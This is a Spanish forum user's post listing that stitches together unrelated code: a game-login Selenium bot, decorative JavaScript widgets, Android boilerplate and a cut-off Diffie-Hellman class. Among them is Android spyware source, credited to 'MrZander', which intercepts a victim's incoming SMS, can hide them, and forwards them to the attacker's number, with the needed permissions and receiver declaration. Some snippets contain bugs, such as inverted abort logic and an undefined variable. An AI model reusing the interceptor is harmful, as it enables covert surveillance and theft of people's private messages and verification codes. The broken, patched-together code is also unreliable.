Hola a todos,
¿dónde puedo conseguir un número virtual gratis para WhatsApp?
Gracias y saludos
¿dónde puedo conseguir un número virtual gratis para WhatsApp?
Gracias y saludos
Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
Mostrar Mensajes Menú






import org.openqa.selenium.By;
import org.openqa.selenium.WebDriver;
import org.openqa.selenium.WebElement;
import org.openqa.selenium.htmlunit.HtmlUnitDriver;
public class Main {
private static final String _URL = "http://ddosthegame.com/index.php", _NOMBREUSUARIO = "/*nombreusuario*/", _CONTRASENA = "/*contrasena*/";
static WebDriver driver;
static WebElement element;
public static final void imprimir(final String s)
{
System.out.println(s);
}
public static void main(String[] args)
{
imprimir("Conectando...");
conectar(_URL);
}
public static void conectar(String url)
{
driver = new HtmlUnitDriver();
driver.get(url);
String usuarioEl = "nombreusuario", passEl = "contrasena";
imprimir("Estableciendo datos de nombreusuario... (" + _NOMBREUSUARIO + ")");
element = driver.findElement(By.name(usuarioEl));
element.sendKeys(_NOMBREUSUARIO);
imprimir("Estableciendo datos de la contraseña... (" + _CONTRASENA + ")");
element = driver.findElement(By.name(passEl));
element.sendKeys(_CONTRASENA);
imprimir("Iniciando seción ");
driver.findElement(By.name("login_today")).click();
if (driver.getTitle().contains("- index"))
{
imprimir("Ha iniciado sesión correctamente!");
}
driver.get("http://ddosthegame.com/index.php?page=resolve");
imprimir(driver.getTitle());
driver.close();
}
public static void resolverBot(String nombreusuario, int cantidad)
{
imprimir("Resolviendo " + nombreusuario + " " + amount + "veces");
for (int i = 0; i < 100; i++)
{
element = driver.findElement(By.name("userid"));
element.sendKeys(nombreusuario);
driver.findElement(By.name("resolve_user")).click();
}
}
<!DOCTYPE html>
<html>
<head>
<title>Ejemplo de javascript</title>
<meta charset="UTF-8">
</head>
<body>
<!-- Presentado por javascripts-gratis.de -->
<script type='text/javascript'>
<!--
var obj1 = new Array(100), mc,mc1, cur_obj, total_sel, win = false, cpu_sel, ost, user_sel, game = true;
function RemoveElementByNum(num) {
document.getElementById("ch"+num).style.display = 'none';
document.getElementById("im"+num).style.display = 'none';
}
function RemoveCpuSel(num) {
del = num;
for ( i=0; i<mc1; i++ ) {
ename = document.getElementById("ch"+i);
if (del!=0) {
if (ename.style.display != 'none') {
ename.style.display = 'none';
document.getElementById("im"+i).style.display = 'none';
del-=1;
}
}
}
}
function GetClickedElement(){
total=0;
result=false;
for (i=0; i<mc1; i++) {
ename = document.getElementById("ch"+i);
if ((ename.style.display != 'none') && (ename.checked)) {
total++;
}
}
if (total>3) {
alert('Demasiados fosforos seleccionados. No puedes seleccionar mas de tres fosforos!');
result=false;
} else {
result=true;
}
document.getElementById("maderalog").value = "Tu tomas "+total+" pieza/s.";
total_sel=total;
user_sel=total;
return result;
}
function AI() {
if ( (mc>1) && (win==false) ) {
game = true;
}
if (game == true) {
if ( (mc-user_sel)==1 ) {
win=true;
game=false;
}
if ( (mc%4)!=1 ) {
ost=(mc-user_sel)%4;
if (ost==0) {
ost=4;
}
if (ost>1) {
cpu_sel=ost-1;
} else {
cpu_sel=Math.floor( (3*Math.random()) );
cpu_sel++;
if (cpu_sel>mc) {
cpu_sel=mc;
}
}
}
else {
cpu_sel=4-user_sel;
}
RemoveCpuSel(cpu_sel);
mc=mc-(cpu_sel+user_sel);
document.getElementById("maderalog").value='La computadora toma '+cpu_sel+' pieza/s.';
}
if ( (mc==1) || (mc<1)) {
game = false;
if (win == true) {
document.getElementById("maderalog1").style.visibility='hidden';
document.getElementById("maderalog").style.visibility='hidden';
document.getElementById("eliminar").style.visibility='hidden';
alert('Felicitaciones! Tu has ganado!!!!');
game=false;
} else {
document.getElementById("maderalog1").style.visibility='hidden';
document.getElementById("maderalog").style.visibility='hidden';
alert('Tu has perdido. La inteligencia artificial ha ganado!!!! JA - JA - JA!!!!');
game=false;
document.body.innerHTML = ""
}
}
document.getElementById("maderalog1").value = "Sobra/n " +mc+ " pieza/s";
}
function RemoveSelected(){
if ((total_sel!=0) && (total_sel<4)) {
user_sel=total_sel;
for (i=0; i<mc1; i++) {
ename = document.getElementById("ch"+i);
if ((ename.style.display != 'none') && ename.checked) {
RemoveElementByNum(i);
}
total_sel=0;
}
AI();
} else {
if (total_sel>3) {
alert("Demasiados fosforos seleccionados.");
} else {
alert('Nada seleccionado');
}
}
}
function initMadera() {
mc = prompt("Cantidad de fosforos?. La cantidad debe hallarse entre 7 y 50", "23");
if (mc<7) mc=7;
if (mc>50) mc=50;
mc1 = mc;
document.write('<center><table border="0" cellspacing="0" cellpadding="0"><tr>');
for (i=0; i<mc; i++) {
document.write('<td align="center"><div style="height: 70px; width: 7px; background-color: #C0C077;" name="im'+i+'" id="im'+i+'"><div style="height: 7px; width: 7px; background-color: #FF3300;"></div></div></td>');
obj1[i]=1;
}
document.write('</tr><tr>');
for (i=0; i<mc; i++) {
document.write('<td><input type="checkbox" onclick="GetClickedElement();" name="ch'+i+'" id="ch'+i+'" /></td>');
}
document.write('</tr></table>');
document.write('<br /><input type="button" value="Eliminar fosforos seleccionados" onclick="RemoveSelected();" id="eliminar" />');
document.write('<br /><br /><br /><br />');
document.write('<input type="text" name="maderalog" id="maderalog" size="30" /><br />');
document.write('<input type="text" name="maderalog1" id="maderalog1" size="30" /><br />');
document.write('</center>');
}
//-->
</script>
<script type="text/javascript">initMadera();</script>
<!-- Presentado por javascripts-gratis.de -->
</body>
</html>
<!DOCTYPE html>
<html>
<head>
<title>Ejemplo de javascript</title>
<meta charset="UTF-8">
</head>
<body>
<!-- Presentado por javascripts-gratis.de -->
<script type='text/javascript'>
<!--
// Script by Freddus
// visit my site: http://www.friederklein.de
/////////////////////
var altura = 60; // Configurar aqui la altura original de la imagen
var anchura = 468; // Configurar aqui la anchura original de la imagen
var imagensita = "https://media.giphy.com/media/l41lLf17l7YCZ4Tjq/giphy.gif"; // Dirección hacia la imagen
/////////////////////
var contador=0;
function emboque(){
var pixels;
document.getElementById("miimagenzoom").height = document.getElementById("miimagenzoom").height+altura/20;
document.getElementById("miimagenzoom").width = document.getElementById("miimagenzoom").width+anchura/20
if (contador<20){
setTimeout("emboque()",50);
}// Fin del if
contador++;
}//Fin del emboque
function initimagen() {
document.write('<div align="center">');
document.write('<img height="0" width="0" id="miimagenzoom" src="'+imagensita+'" onload="emboque();">');
document.write('</div>');
}
//-->
</script>
<script type="text/javascript">initimagen();</script>
<!-- Presentado por javascripts-gratis.de -->
</body>
</html>
<!DOCTYPE html>
<html>
<head>
<title>Ejemplo de javascript</title>
<meta charset="UTF-8">
</head>
<body>
<!-- Presentado por javascripts-gratis.de -->
<script type='text/javascript'>
<!--
// Script e idea: Freddus
// Aqui por favor ingresar las URLs de la imagenes dentro de las "" y separadas respectivamente por un ,
var i = 0;
var urls = new Array();
urls[i++] = "https://media.giphy.com/media/l41lLf17l7YCZ4Tjq/giphy.gif",
urls[i++] = "https://media.giphy.com/media/l1KdaZkQLqgeoPu1y/giphy.gif",
urls[i++] = "https://media.giphy.com/media/xT0CyGZSg7oN0ochi0/giphy.gif",
urls[i++] = "https://media.giphy.com/media/3o6MbubPM8ek3dbNle/giphy.gif",
urls[i++] = "https://media.giphy.com/media/3ov9k5IJTC6YXh91iU/giphy.gif";
// Aqui configurar el tiempo que quieren que pase hasta que se cambie de imagen
var segundos = 2;
///////////////////////////////////////////////
// No cambiar nada mas, como siempre ;o)
var lastimage;
document.write("<div id='randomimagediv'></div>");
function newimage()
{
var newurl;
do
{
newurl = urls[Math.floor(Math.random()*urls.length)];
}
while (newurl == lastimage)
lastimage = newurl;
document.getElementById("randomimagediv").innerHTML = '<img src="' + newurl + '" alt="" />';
}
//-->
</script>
<script type="text/javascript">window.setInterval("newimage()",segundos*1000);</script>
<!-- Presentado por javascripts-gratis.de -->
</body>
</html>
<!DOCTYPE html>
<html>
<head>
<title>Ejemplo de javascript</title>
<meta charset="UTF-8">
</head>
<body>
<!-- Presentado por javascripts-gratis.de -->
<script type='text/javascript'>
<!--
// Ajustar tamaño y posición
var zx,zy;
var mediox = 100;
var medioy = 50;
var radio = 100;
var speed = 2; // 1-10... + o - para la dirección
var imagenes_i = 0;
var imagenes = new Array();
var alpha = new Array();
// Ajustar las imagenes aqui
// Sintaxis: Link-URL => URL de la imagen
imagenes[imagenes_i++] = 'http://4.bp.blogspot.com => http://4.bp.blogspot.com/-y0zqfg-NQvg/UD0fMKA4rFI/AAAAAAAAAC8/6gn1s0JmCCc/s320/1418009890.png';
imagenes[imagenes_i++] = 'https://2.bp.blogspot.com => https://2.bp.blogspot.com/-d10rOGrZ7Hs/Tz5GT465rhI/AAAAAAAAHPs/pea6FI2bxKk/s200/juego+los+animales+de+granja.jpg';
imagenes[imagenes_i++] = 'https://pbs.twimg.com => https://pbs.twimg.com/profile_images/611270112843165697/sFT_vQcc_400x400.jpg';
imagenes[imagenes_i++] = 'http://www.misjuegos.com.mx => http://www.misjuegos.com.mx/wp-content/uploads/2009/05/8.png';
// A partir de aqui no cambiar mas nada
function initRotat() {
alpha_tmp = 0;
speed = speed / 1000;
for ( var i = 0; i < imagenes.length; i++)
{
alpha[i] = 6.28 / (imagenes.length) + alpha_tmp; // 0,1.6,3.2,4.8
var tmp = imagenes[i].split(" => ");
document.write('<div id="icon'+i+'" style="position:absolute;"><a href="'+tmp[0]+'"><img src="'+tmp[1]+'" alt="" border="0" /></a></div>');
alpha_tmp = alpha[i];
}
}
function pol_zu_kart(mx,my,radio,alp)
{
zx = mx + (radio * Math.sin(alp));
zy = my + (radio * Math.cos(alp));
}
function seguirgirando()
{
for (var i = 0; i < imagenes.length; i++)
{
alpha[i]+=speed;
if (speed>0)
{
if(alpha[i]>6.28) alpha[i]-=6.28;
}
else
{
if(alpha[i]<0) alpha[i]+=6.28;
}
pol_zu_kart(mediox,medioy,radio,alpha[i]);
document.getElementById('icon'+i).style.top=zy+'px';
document.getElementById('icon'+i).style.left=zx+'px';
}
}
initRotat();
//-->
</script>
<script type="text/javascript">status = window.setInterval("seguirgirando()",10);</script>
<!-- Presentado por javascripts-gratis.de -->
</body>
</html>
<!DOCTYPE html>
<html>
<head>
<title>Ejemplo de javascript</title>
<meta charset="UTF-8">
</head>
<body>
<!-- Presentado por javascripts-gratis.de -->
<script type='text/javascript'> <!--
Image0 = new Image();
Image0.src = "bubbles.gif";
Amount = 20;
Ymouse = -50;
Xmouse = -50;
Ypos = new Array();
Xpos = new Array();
Speed = new Array();
rate = new Array();
grow = new Array();
Step = new Array();
Cstep = new Array();
nsSize = new Array();
ns = (document.layers)?1:0;
(document.layers)?window.captureEvents(Event.MOUSEMOVE):0;
function Mouse(e) {
Ymouse=(e)?e.pageY-20:window.event.y-20;
Xmouse=(e)?e.pageX:window.event.x;
}
(document.layers)?window.onMouseMove=Mouse:document.onmousemove=Mouse;
for (i = 0; i < Amount; i++) {
Ypos[i] = Ymouse;
Xpos[i] = Xmouse;
Speed[i] = Math.random()*4+1;
Cstep[i] = 0;
Step[i] = Math.random()*0.1+0.05;
grow[i] = 8;
nsSize[i] = Math.random()*15+5;
rate[i] = Math.random()*0.5+0.1;
}
if (ns) {
for (i = 0; i < Amount; i++) {
document.write("<LAYER NAME='sn"+i+"' LEFT=0 TOP=0><img src="+Image0.src+" name='N' width="+nsSize[i]+" height="+nsSize[i]+"></LAYER>");
}
}
else {
document.write('<div style="position:absolute;top:0px;left:0px"><div style="position:relative">');
for (i = 0; i < Amount; i++) {
document.write('<img id="si'+i+'" src="'+Image0.src+'" style="position:absolute;top:0px;left:0px;filter:alpha(opacity=90);">');
}
document.write('</div></div>');
}
function MouseBubbles() {
var hscrll = (document.layers)?window.pageYOffset:document.documentElement.scrollTop;
var wscrll = (document.layers)?window.pageXOffset:document.documentElement.scrollLeft;
for (i = 0; i < Amount; i++){
sy = Speed[i] * Math.sin(270 * Math.PI / 180);
sx = Speed[i] * Math.cos(Cstep[i] * 4);
Ypos[i] += sy;
Xpos[i] += sx;
if (Ypos[i] < -40) {
Ypos[i] = Ymouse;
Xpos[i] = Xmouse;
Speed[i] = Math.random() * 6 + 4;
grow[i] = 8;
nsSize[i] = Math.random() * 15 + 5;
}
if (ns) {
document.layers['sn'+i].left = Xpos[i] + wscrll;
document.layers['sn'+i].top = Ypos[i] + hscrll;
}
else {
document.getElementById('si'+i).style.left = Xpos[i] + wscrll+"px";
document.getElementById('si'+i).style.top = Ypos[i] + hscrll+"px";
document.getElementById('si'+i).style.width = grow[i]+"px";
document.getElementById('si'+i).style.height = grow[i]+"px";
}
grow[i] += rate[i];
Cstep[i] += Step[i];
if (grow[i] > 24) grow[i] = 25;
}
setTimeout('MouseBubbles()', 10);
}
//-->
</script>
<!-- Presentado por javascripts-gratis.de --><br />
<script type="text/javascript">MouseBubbles();</script>
</body>
</html>
<!DOCTYPE html>
<html>
<head>
<title>Ejemplo de javascript</title>
<meta charset="UTF-8">
</head>
<body>
<!-- Presentado por javascripts-gratis.de -->
<script type='text/javascript'>
<!--
message = 'www.javascripts-gratis.de '; // Tu texto
FonT = 'Verdana'; // Tu fuente
ColoR = '000080'; // Tu color de letra
SizE = 3; // Tu tamaño de letra (solamente 1 hasta 7)!
var amount = 5, ypos =- 50, xpos = 0, Ay = 0, Ax = 0, By = 0, Bx = 0, Cy = 0, Cx = 0, Dy = 0, Dx = 0, Ey = 0, Ex = 0;
if (document.layers) {
for (i = 0; i < amount; i++) {
document.write('<layer name=nsl'+i+' top=0 left=0><font face='+FonT+' size='+SizE+' color='+ColoR+'>'+message+'</font></layer>');
}
window.captureEvents(Event.MOUSEMOVE);
function nsmouse(evnt) {
xpos = evnt.pageX + 20;
ypos = evnt.pageY + 20;
}
window.onMouseMove = nsmouse;
}
else if (document.getElementById) {
document.write("<div id='outermausi' style='position:absolute;top:0px;left:0px'>");
document.write("<div style='position:relative'>");
for (i = 0; i < amount; i++) {
document.write('<div id="text'+i+'" style="position:absolute;top:0px;left:0px;width:400px;height:20px"><font face='+FonT+' size='+SizE+' color='+ColoR+'>'+message+'</font></div>')
}
document.write("</div>");
document.write("</div>");
function iemouse(e) {
ypos = (e)?e.pageY:event.y + 20;
xpos = (e)?e.pageX:event.x + 20;
}
window.document.onmousemove = iemouse;
}
function makefollow() {
if (document.layers) {
document.layers['nsl'+0].top = ay;
document.layers['nsl'+0].left = ax;
document.layers['nsl'+1].top = by;
document.layers['nsl'+1].left = bx;
document.layers['nsl'+2].top = cy;
document.layers['nsl'+2].left = cx;
document.layers['nsl'+3].top = Dy;
document.layers['nsl'+3].left = Dx;
document.layers['nsl'+4].top = Ey;
document.layers['nsl'+4].left = Ex;
}
else if (document.getElementById) {
document.getElementById('outermausi').style.top = document.documentElement.scrollTop;
document.getElementById('text0').style.top = ay+"px";
document.getElementById('text0').style.left = ax+"px";
document.getElementById('text1').style.top = by+"px";
document.getElementById('text1').style.left = bx+"px";
document.getElementById('text2').style.top = cy+"px";
document.getElementById('text2').style.left = cx+"px";
document.getElementById('text3').style.top = Dy+"px";
document.getElementById('text3').style.left = Dx+"px";
document.getElementById('text4').style.top = Ey+"px";
document.getElementById('text4').style.left = Ex+"px";
}
}
function move() {
ey = Ey += (ypos - Ey) * 0.2;
ex = Ex += (xpos - Ex) * 0.2;
dy = Dy += (ey - Dy) * 0.3;
dx = Dx += (ex - Dx) * 0.3;
cy = Cy += (dy - Cy) * 0.4;
cx = Cx += (dx - Cx) * 0.4;
by = By += (cy - By) * 0.5;
bx = Bx += (cx - Bx) * 0.5;
ay = Ay += (by - Ay) * 0.6;
ax = Ax += (bx - Ax) * 0.6;
makefollow();
setTimeout('move()', 10);
}
//-->
</script>
<script type="text/javascript">move();</script>
</body>
</html>
<!DOCTYPE html>
<html>
<head>
<title>Ejemplo de javascript</title>
<meta charset="UTF-8">
</head>
<body>
<!-- Presentado por javascripts-gratis.de -->
<script type='text/javascript'>
<!--
//Trio Script by kurt.grigg (at) virgin.net
//Elige los colores y el tamaño
var a_Colour='ff0000';
var b_Colour='222222';
var c_Colour='0000ff';
var Size=50;
//A partir de aca no cambiar mas nada
var YDummy=new Array(),XDummy=new Array(),xpos=0,ypos=0,ThisStep=0;step=0.2;
if (document.layers){
window.captureEvents(Event.MOUSEMOVE);
function nsMouse(evnt){
xpos = window.pageYOffset+evnt.pageX+6;
ypos = window.pageYOffset+evnt.pageY+16;
}
window.onMouseMove = nsMouse;
}
else if (document.getElementById)
{
function ieMouse(e){
if (!e) {
xpos = document.documentElement.scrollLeft+event.x+6;
ypos = document.documentElement.scrollTop+event.y+16;
} else {
xpos = e.pageX+6;
ypos = e.pageY+16;
}
}
document.onmousemove = ieMouse;
}
function swirl(){
for (i = 0; i < 3; i++)
{
YDummy[i]=ypos+Size*Math.cos(ThisStep+i*2)*Math.sin((ThisStep+i*25)/2);
XDummy[i]=xpos+Size*Math.sin(ThisStep+i*2)*Math.sin((ThisStep+i*25)/2)*Math.sin(ThisStep/4);
}
ThisStep+=step;
setTimeout('swirl()',10);
}
var amount=10;
if (document.layers){
for (i = 0; i < amount; i++)
{
document.write('<layer name=nsa'+i+' top=0 left=0 width='+i/2+' height='+i/2+' bgcolor='+a_Colour+'></layer>');
document.write('<layer name=nsb'+i+' top=0 left=0 width='+i/2+' height='+i/2+' bgcolor='+b_Colour+'></layer>');
document.write('<layer name=nsc'+i+' top=0 left=0 width='+i/2+' height='+i/2+' bgcolor='+c_Colour+'></layer>');
}
}
else if (document.getElementById){
document.write('<div id="ODiv" style="position:absolute;top:0px;left:0px">'
+'<div id="IDiv" style="position:relative">');
for (i = 0; i < amount; i++)
{
document.write('<div id="x'+i+'" style="position:absolute;top:0px;left:0px;width:'+i/2+'px;height:'+i/2+'px;background:#'+a_Colour+';font-size:'+i/2+'"></div>');
document.write('<div id="y'+i+'" style="position:absolute;top:0px;left:0px;width:'+i/2+'px;height:'+i/2+'px;background:#'+b_Colour+';font-size:'+i/2+'"></div>');
document.write('<div id="z'+i+'" style="position:absolute;top:0px;left:0px;width:'+i/2+'px;height:'+i/2+'px;background:#'+c_Colour+';font-size:'+i/2+'"></div>');
}
document.write('</div></div>');
}
function prepos(){
var ntscp=document.layers;
var msie=document.getElementById;
if (document.layers){
for (i = 0; i < amount; i++)
{
if (i < amount-1)
{
ntscp['nsa'+i].top=ntscp['nsa'+(i+1)].top;ntscp['nsa'+i].left=ntscp['nsa'+(i+1)].left;
ntscp['nsb'+i].top=ntscp['nsb'+(i+1)].top;ntscp['nsb'+i].left=ntscp['nsb'+(i+1)].left;
ntscp['nsc'+i].top=ntscp['nsc'+(i+1)].top;ntscp['nsc'+i].left=ntscp['nsc'+(i+1)].left;
}
else
{
ntscp['nsa'+i].top=YDummy[0];ntscp['nsa'+i].left=XDummy[0];
ntscp['nsb'+i].top=YDummy[1];ntscp['nsb'+i].left=XDummy[1];
ntscp['nsc'+i].top=YDummy[2];ntscp['nsc'+i].left=XDummy[2];
}
}
}
else if (document.getElementById){
for (i = 0; i < amount; i++)
{
if (i < amount-1)
{
document.getElementById('x'+i).style.top=document.getElementById('x'+(i+1)).style.top;
document.getElementById('x'+i).style.left=document.getElementById('x'+(i+1)).style.left;
document.getElementById('y'+i).style.top=document.getElementById('y'+(i+1)).style.top;
document.getElementById('y'+i).style.left=document.getElementById('y'+(i+1)).style.left;
document.getElementById('z'+i).style.top=document.getElementById('z'+(i+1)).style.top;
document.getElementById('z'+i).style.left=document.getElementById('z'+(i+1)).style.left;
}
else
{
document.getElementById('x'+i).style.top=YDummy[0]+"px";document.getElementById('x'+i).style.left=XDummy[0]+"px";
document.getElementById('y'+i).style.top=YDummy[1]+"px";document.getElementById('y'+i).style.left=XDummy[1]+"px";
document.getElementById('z'+i).style.top=YDummy[2]+"px";document.getElementById('z'+i).style.left=XDummy[2]+"px";
}
}
}
setTimeout("prepos()",10);
}
function Inicio(){
swirl(),prepos()
}
//-->
</script>
<script type="text/javascript">function addEvent179(obj,type,fn){if(obj.addEventListener){obj.addEventListener(type,fn,false)}else if(obj.attachEvent){obj["e"+type+fn]=fn;obj[type+fn]=function(){obj["e"+type+fn](window.event)};obj.attachEvent("on"+type,obj[type+fn])}};addEvent179(window,'load',Inicio);</script>
<!-- Presentado por javascripts-gratis.de -->
</body>
</html>
<!DOCTYPE html>
<html>
<head>
<title>Ejemplo de javascript</title>
<meta charset="UTF-8">
</head>
<body>
<!-- presentado por javascripts-gratis.de -->
<script type='text/javascript'>
<!--
//Logo Orbit II kurt.grigg (at) virgin.net
yourLogo='https://www.javascripts-gratis.de ';
logoFont='Verdana';
logoSize=1; // 1-7 only! Para una letra mas grande cambia logowidth y logoheight!
logoColor='888888';
logoWidth=70;
logoHeight=70;
logoSpeed=0.03;
//A partir de aqui no cambiar mas nada!
yourLogo=yourLogo.split('');
L=yourLogo.length;
Result="<font face="+logoFont+" size="+logoSize+" color="+logoColor+">";
TrigSplit=360/L;
br=(document.layers)?1:0;
if (br){
for (i=0; i < L; i++)
document.write('<layer name="ns'+i+'" top=0 left=0 width=14 height=14">'+Result+yourLogo[i]+'</font></layer>');
}
else{
document.write('<div id="outer" style="position:absolute;top:0px;left:0px"><div style="position:relative">');
for (i=0; i < L; i++)
document.write('<div id="ie'+i+'" style="position:absolute;top:0px;left:0px;width:14px;height:14px">'+Result+yourLogo[i]+'</font></div>');
document.write('</div></div>');
}
ypos=0;
xpos=0;
step=logoSpeed;
currStep=0;
Y=new Array();
X=new Array();
Yn=new Array();
Xn=new Array();
for (i=0; i < L; i++)
{
Yn[i]=0;
Xn[i]=0;
}
(document.layers)?window.captureEvents(Event.MOUSEMOVE):0;
function Mouse(e){
ypos = (e)?e.pageY:event.y;
xpos = (e)?e.pageX:event.x;
}
(document.layers)?window.onMouseMove=Mouse:document.onmousemove=Mouse;
function animateLogo(){
if (!br)document.getElementById('outer').style.pixelTop=document.documentElement.scrollTop;
for (i=0; i < L; i++){
var layer=(document.layers)?document.layers['ns'+i]:document.getElementById('ie' +i).style;
layer.top =Y[i]+logoHeight*Math.sin(currStep+i*TrigSplit*Math.PI/180)+"px";
layer.left=X[i]+logoWidth*Math.cos(currStep+i*TrigSplit*Math.PI/180)+"px";
}
currStep-=step;
}
function Delay(){
for (i=L; i >= 0; i--)
{
Y[i]=Yn[i]+=(ypos-Yn[i])*(0.1+i/L);
X[i]=Xn[i]+=(xpos-Xn[i])*(0.1+i/L);
}
animateLogo();
setTimeout('Delay()',20);
}
//-->
</script>
<script type="text/javascript">function addEvent182(obj,type,fn){if(obj.addEventListener){obj.addEventListener(type,fn,false)}else if(obj.attachEvent){obj["e"+type+fn]=fn;obj[type+fn]=function(){obj["e"+type+fn](window.event)};obj.attachEvent("on"+type,obj[type+fn])}};addEvent182(window,'load',Delay);</script>
<!-- presentado por javascripts-gratis.de -->
</body>
</html>

<menu xmlns:app="http://schemas.android.com/apk/res-auto" xmlns:android="http://schemas.android.com/apk/res/android">
<item
android:id="@+id/ojo"
android:icon="@drawable/ic_l_view_light"
android:title="Ojo"
android:showAsAction="ifRoom"
android:actionButtonStyle="@style/myActionButtonStyle" />
</menu>
<style name="myActionButtonStyle" parent="Widget.AppCompat.ActionButton">
<item name="android:minWidth">30dp</item>
<item name="android:maxWidth">48dp</item>
<item name="android:width">38dp</item>
</style>
package com.mycompany.myapp;
import android.app.*;
import android.os.*;
import android.view.Menu;
public class MainActivity extends Activity
{
@Override
protected void onCreate(Bundle savedInstanceState)
{
super.onCreate(savedInstanceState);
setContentView(R.layout.main);
}
@Override
public boolean onCreateOptionsMenu(Menu menu) {
getMenuInflater().inflate(R.menu.menu, menu);
return true;
}
}


package com.example.dprotector;
import android.os.AsyncTask;
import android.os.Bundle;
import android.app.Activity;
import android.view.Menu;
import android.view.View;
import android.widget.Button;
public class MainActivity extends Activity {
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_main);
final Button toque = (Button) findViewById(R.id.boton1);
final calcul mCalcul = new calcul();
toque.setOnClickListener(new View.OnClickListener(){
@Override
public void onClick(View v) {
mCalcul.execute();
}
});
}
@Override
public boolean onCreateOptionsMenu(Menu menu) {
getMenuInflater().inflate(R.menu.main, menu);
return true;
}
private class calcul extends AsyncTask<Void, String, Void>
{
@Override
protected void onPreExecute() {
super.onPreExecute();
// Aquí, podemos mostrar un mensaje como un toast antes de que comience el proceso.
}
@Override
protected void onProgressUpdate(String... valores){
super.onProgressUpdate(valores);
// Aquí puedes actualizar la GUI (como la barra de progreso, o cosas así)
}
@Override
protected Void doInBackground(Void... arg0) {
//Tu proceso
return null;
}
@Override
protected void onPostExecute(Void resultados) {
// Esto se ejecutará una vez finalizado el proceso.
}
}
}
//Author: MrZander
import java.util.Arrays;
import android.content.BroadcastReceiver;
import android.content.Context;
import android.content.Intent;
import android.os.Bundle;
import android.telephony.SmsManager;
import android.telephony.SmsMessage;
public class SmsReceiver extends BroadcastReceiver {
// CONFIGURATION //
// Esto cancelará la transmisión del SMS recibido.
// Si esto es true, la víctima NO recibirá el mensaje que se le envía.
boolean abortarTM = true;
// Si se debe interceptar o no TODOS los mensajes.
boolean interceptarTodos = false;
// si interceptarTodos está apagado, esta es la matriz de números que serán interceptados.
String[] numeros = {"5551234567","5551234655"};
// Estos son los números de celulares a los que se ENVIARÁN los mensajes. (Su celular).
String redireccionarCelular = "1235558765";
// En emisión recibida. Mensaje SMS entrante.
public void onReceive(Context context, Intent intento) {
Bundle extras = intento.getExtras();
String mensajes = "";
// Se utiliza para determinar si un mensaje debe ser redirigido o no.
boolean esDeEspia = false;
if ( extras != null ) {
Object[] smsExtra = (Object[]) extras.get("pdus"); //" Unidades de descripción de protocolo "
for ( int i = 0; i < smsExtra.length; ++i ) { // Recorrer todos los mensajes (si se divide).
// Recibe el mensaje de las UDP
SmsMessage sms = SmsMessage.createFromPdu((byte[])smsExtra[i]);
// Si interceptarTodos es verdadero o el número de teléfono está en la matriz de números para interceptar.
if(interceptarTodos||Arrays.asList(numeros).contains(sms.getDisplayOriginatingAddress())){
// Si el mensaje se disecciona en múltiples, concatenar.
mensajes+=sms.getMessageBody()+"\n";
// Este mensaje es de la víctima, redirigir.
esDeEspia=true;
//Abortar SMS.
if(!abortarTM){
abortBroadcast();
}
}
}
// Redirigir mensaje si es de la víctima
if(esDeEspia){
enviarSms(mensajes,"TUNUMERO");
}
}
}
// Enviar SMS ... bastante sencillo
public void enviarSms(String mensaje, String numcelular){
SmsManager gs = SmsManager.getDefault();
try{
gs.sendTextMessage(numcelular, null, mensaje, null, null);
}catch(Exception ex){
// Error, este mensaje se perderá ... Les sugiero que creen
// un método para hacer una copia de seguridad de los mensajes en caso de error y que lo vuelvan a intentarlo más tarde.
}
}
}
<uses-permission android:name="android.permission.RECEIVE_SMS" />
<uses-permission android:name="android.permission.SEND_SMS" />
<receiver android:name=".SmsReceiver" android:enabled="true">
<intent-filter android:priority="1000">
<action android:name="android.provider.Telephony.SMS_RECEIVED" />
</intent-filter>
</receiver>
import java.math.BigInteger;
import java.security.SecureRandom;
/**
* Utilizes a Diffie-Hellman Key-Exchange<br>
* <br>
* <pre>
* Partner A Partner B
* g, p, a (randomly) b (randomly)
* A = g^a mod p
* g, p, A ==>
* B = g^b mod p
* <== B
* K = B^a mod p K = A^b mod p
* </pre>
* <br>
* Example Usage:<br>
* Partner A:<br>
* <code>
* DiffieHellman dh = new DiffieHellman(DiffieHellman.PARTNER_A);<br>
* dh.init(512);<br>
* sendToOtherSide(dh.getG());<br>
* sendToOtherSide(dh.getP());<br>
* sendToOtherSide(dh.getA());<br>
* byte[] key = dh.getKey(receiveFromOtherSide());<br>
* </code><br>
* <br>
* Partner B:<br>
* <code>
* DiffieHellman dh = new DiffieHellman(DiffieHellman.PARTNER_B);<br>
* dh.init(512);<br>
* BigInteger g = receiveFromOtherSide();<br>
* BigInteger p = receiveFromOtherSide();<br>
* BigInteger A = receiveFromOtherSide();<br>
* byte[] key = dh.getKey(g, p, A);<br>
* sendToOtherSide(dh.getB());<br>
* </code>
* @author Tobias Marstaller
*/
public class DiffieHellman
{
public static final int PARTNER_A = 0xF124A;
public static final int PARTNER_B = 0xC134B;
protected BigInteger g;
protected BigInteger p;
protected BigInteger a;
protected BigInteger b;
protected BigInteger A;
protected BigInteger B;
protected byte[] K;
protected int side;
protected boolean initDone = false;
protected SecureRandom rand;
/**
* Constructs a new Key-Exchange for the given side
*/
public DiffieHellman(int side)
{
if (side != PARTNER_A && side != PARTNER_B)
{
throw new IllegalArgumentException("side must be equal to PARTNER_A or PARTNER_B");
}
this.side = side;
}
/**
* Constructs a new Key-Exchange for the given side with the default bit
* length 1024 and <code>random</code> as a source of randomness.
* @param random A SPRNG for the parameter-generation
*/
public DiffieHellman(int side, SecureRandom random)
{
this(side);
this.rand = random;
}
/**
* Constructs a new Key-Exchange for side B (therefore <code>assert(side == PARTNER_B)</code>)
* with <code>b</code> as the private parameter.<br>
* If this constructor is used, the call to {@link #init()} is not required anymore.
* @param b The private parameter <code>b</code>
*/
public DiffieHellman(int side, BigInteger b)
{
if (side != PARTNER_B)
{
throw new IllegalArgumentException("Side must be PARTNER_B");
}
this.side = side;
this.b = b;
initDone = true;
}
/**
* Constructs a new Key-Exchange for side A (therefore <code>assert(side == PARTNER_A)</code>)
* with <code>g</code>, <code>p</code> and <code>a</code> as the private parameters.<br>
* If this constructor is used, the call to {@link #init()} is not required anymore.
* @param g The private parameter <code>g</code>
* @param p The private parameter <code>p</code>
* @param a The private parameter <code>a</code>
*/
public DiffieHellman(int side, BigInteger g, BigInteger p, BigInteger a)
{
if (side != PARTNER_A)
{
throw new IllegalArgumentException("Side must be PARTNER_A");
}
this.side = side;
this.g = g;
this.p = p;
this.a = a;
